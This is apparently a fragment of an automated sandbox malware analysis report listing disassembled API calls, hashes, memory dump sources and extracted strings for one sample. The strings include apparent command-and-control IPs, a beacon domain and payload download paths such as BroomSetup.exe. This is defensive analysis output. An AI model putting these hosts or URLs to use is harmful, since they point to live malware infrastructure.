                                                                                                                                                                                                                              • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                              • String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
                                                                                                                                                                                                                              • API String ID: 2531350358-3920416335
                                                                                                                                                                                                                              • Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
                                                                                                                                                                                                                              • Instruction ID: 99cc6714516f8909dad58e2b9982786623075aadd147b919e68169f16a2597cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1A2231060F2D0AEC711B77D585A7DE2BE19B63240F5478EDC2A85B372CB69A10CC7DA
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 00420977
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 004209D2
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                              • String ID: ,CUSA
                                                                                                                                                                                                                              • API String ID: 745075371-2978500865
                                                                                                                                                                                                                              • Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                              • Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                              • Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
                                                                                                                                                                                                                              • Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00420015
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 004200A5
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 004200B3
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                              • String ID: ,CUSA
                                                                                                                                                                                                                              • API String ID: 4212172061-2978500865
                                                                                                                                                                                                                              • Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                              • Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 05B80997
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 05B809C0
                                                                                                                                                                                                                              • GetACP.KERNEL32 ref: 05B809D5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                              • Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                              • Instruction ID: 1d5c913e58b37dfe6072e068786a2bc4e0e041b52b9ba63fa31f49ac7e247ed8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C21B532B4510DEAF730BF5DC909BB772A7FB44AA0B4694E4E96AD7100E732E944C390
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
                                                                                                                                                                                                                              • GetACP.KERNEL32 ref: 0042076E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                              • Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                              • Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FDF
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FEC
                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 05B80BDE
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 05B80C39
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 05B80C48
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 05B80C90
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 05B80CAF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                                                                                              • Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                              • Instruction ID: 720f8fe3cccc43181e7169b72725e7d099e83b7c2264ad172b6a36f655c165c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE519371A4421DABDF20FFA5DC48ABE73B8FF04384F0854A9E915E7150EB70A908CB61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: y%B$y%B
                                                                                                                                                                                                                              • API String ID: 0-2510245575
                                                                                                                                                                                                                              • Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
                                                                                                                                                                                                                              • Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
                                                                                                                                                                                                                                • Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 05B8027C
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 05B8030C
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 05B8031A
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 05B803BD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4212172061-0
                                                                                                                                                                                                                              • Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                              • Instruction ID: 4b521a50e55e1e4c6c74a0cea864140d29b1b1196051edb494815abb1694cfd2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C61E77270460AABD724FF74CC49EBA73A8FF08390F1454AAE516D7190EA74F948C764
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2829624132-0
                                                                                                                                                                                                                              • Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
                                                                                                                                                                                                                              • Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 05B70A9A
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 05B70AA4
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 05B70AB1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                              • Instruction ID: b09352130630b6d54adc8faa0fd38e5ce154e2eeb6433562d4742dcd244718e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F31747594121C9BCB21DF64D988799B7B4FF08310F5041EAE41CA72A0E7749B858F55
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                              • Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,05B73C24,00000003,00438DB0,0000000C,05B73D7B,00000003,00000002,00000000,?,05B72DD2,00000003), ref: 05B73C6F
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,05B73C24,00000003,00438DB0,0000000C,05B73D7B,00000003,00000002,00000000,?,05B72DD2,00000003), ref: 05B73C76
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 05B73C88
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                              • Instruction ID: 69ccf398c72638b8254e95692effb430194a112f6eec016c6a8f326e447d86ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE0BF3120060DABCF116F64DD0CA593F69FB44291F504464FD5686131CB35EE52DA44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                              • API String ID: 0-2784972518
                                                                                                                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                              • Instruction ID: cc0f85a33508f70770c3fe503102feccc68d44d1941a8730300d6716a0dd471e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE318CB6900609CFDB10DF99C884AAEBBF6FF08324F14418AD841A7350D775FA45CBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                              • Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
                                                                                                                                                                                                                              • Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
                                                                                                                                                                                                                              • Instruction ID: 2f39edd191fd54a570c92915abb1c811a28ec953d0c55324fac530f7f1424a7c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90020B75E002199BDF14CFA9C980AADF7F1FF88314F1581AAD829E7384D731AA41CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                                                                              • Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                              • Instruction ID: d496a3c3c483910271fc93442288351b3e3e0859d1307156e40b0bf2bb77038d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59313C7614C1964FC715CB2DD8B85B6BF81FAC612072D43FAD1D68F25AD26DAC46C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                                                                              • Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                              • Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
